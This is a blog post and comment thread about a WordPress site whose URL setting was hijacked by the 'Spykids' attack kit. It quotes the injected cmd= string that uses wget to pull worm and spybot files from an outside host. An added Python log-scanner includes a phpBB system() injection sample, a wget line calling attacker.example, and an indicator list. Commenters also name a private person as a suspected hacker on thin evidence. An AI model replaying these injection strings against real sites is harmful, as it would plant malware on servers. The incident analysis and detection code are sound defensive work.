Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):
http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css
My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:
http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net
That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.
Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer instead of Firefox on a Mac? And how the heck did they change my site URL?
I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complaint against visualcoders.net with Google, who run AdWords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]
L33tdawg
The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.
Good luck.
Cheers,
LD.
Elin
Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.
AWolf
wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.
Tom Bartling
One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.
I did a little research.
The hit came from IP address 213.193.231.130.
213.193.231.130 is owned by Tom Myny at Linux Systems.
The script pointed to visualcoders.net.
Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
visualcoders.net is owned by Mimoun Raddahi.
The original email address for Mimoun Raddahi is mimoun@pandora.be
pandora.be is a domain that is owned by Telenet.
I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.
Hopefully, this will resolve the hacking problem.
On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.
Tom Myny
Hi All,
A script was running on our servers (wget%20www.visualcoders.net/spybot.txt; wget%20www.visualcoders.net/worm1.txt;) because one of the customer’s phpBB sites was hacked (viewforum.php bug).
I removed the buggy php file and stopped the processes.
visualcoders.net is not hosted by us (never was …)
Best Regards,
Tom
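An added example, not code from the post or from any of its commenters: it does by script what Tom Myny’s environment dump does by hand, pulling the request URI out of Apache-style access-log lines, undoing the stacked URL encoding, and turning either the phpBB chr(N) chain or the plain cmd= parameter back into the readable command so the hits can be triaged. The log lines, IPs and hostnames below are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache-style); hosts and IPs are placeholders.
# Line 2 carries the phpBB 'highlight=' shape, line 3 the 'cmd=' shape quoted in the post.
SAMPLE_LOG = """\
10.0.0.9 - - [26/Dec/2004:03:14:01 +0100] "GET /index.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Dec/2004:03:14:07 +0100] "GET /forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(120)%252echr(46)%252echr(116)%252echr(101)%252echr(115)%252echr(116))%252e%2527 HTTP/1.1" 200 1532 "-" "lwp-trivial/1.35"
10.0.0.7 - - [26/Dec/2004:03:14:09 +0100] "GET /~jill/wp-login.php?action=http://attacker.example/spy.gif?&cmd=cd%20/tmp;wget%20attacker.example/spybot.txt HTTP/1.1" 200 0 "-" "lwp-trivial/1.35"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHR_RE = re.compile(r'chr\((\d+)\)')
# Indicator substrings, matched after decoding; taken from the payloads quoted in the thread.
INDICATORS = ("system(", "cmd=", "wget ", "cd /tmp")


def fully_decode(s, rounds=3):
    """Undo stacked URL encoding: %2527 -> %27 -> ' (stops when nothing changes)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def chr_chain_to_text(s):
    """Render chr(99).chr(100)... as text; non-printable codes become '?'."""
    return "".join(chr(c) if 32 <= c < 127 else "?" for c in map(int, CHR_RE.findall(s)))


def inspect_line(line):
    """Return a finding for one log line, or None if nothing suspicious is present."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = fully_decode(m.group(1))
    hits = [i for i in INDICATORS if i in decoded]
    if not hits:
        return None
    command = None
    if "chr(" in decoded:
        command = chr_chain_to_text(decoded)   # phpBB chr()-chain shape
    elif "cmd=" in decoded:
        command = decoded.split("cmd=", 1)[1]  # plain cmd= shape
    return {"uri": m.group(1), "indicators": hits, "command": command}


def scan_log(text):
    return [f for f in map(inspect_line, text.splitlines()) if f]  # one finding per hit
```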
Messenger
HOLA
Lars
Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!
Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.
Then I noticed a repetitive request string using LWP:
http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
which looks like a data scrape script. I reported the flood to Go Daddy but wouldn’t ya know it; visualcoders.net is now hosted (already) somewhere else.
At least we haven’t had any problems with re-write of our files but this kind of action def. borders on the criminal, imho 8-(
Jill
Wow, thanks guys, for the speedy work! Google works really fast, yes…
There’s a lot more about this kind of attack on WordPress blogs in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.
Scary, huh?
k
welcome to the internet.
Bryan-Mitchell Young
Apparently, it is a new worm going around that attacks PHP sites, including WordPress.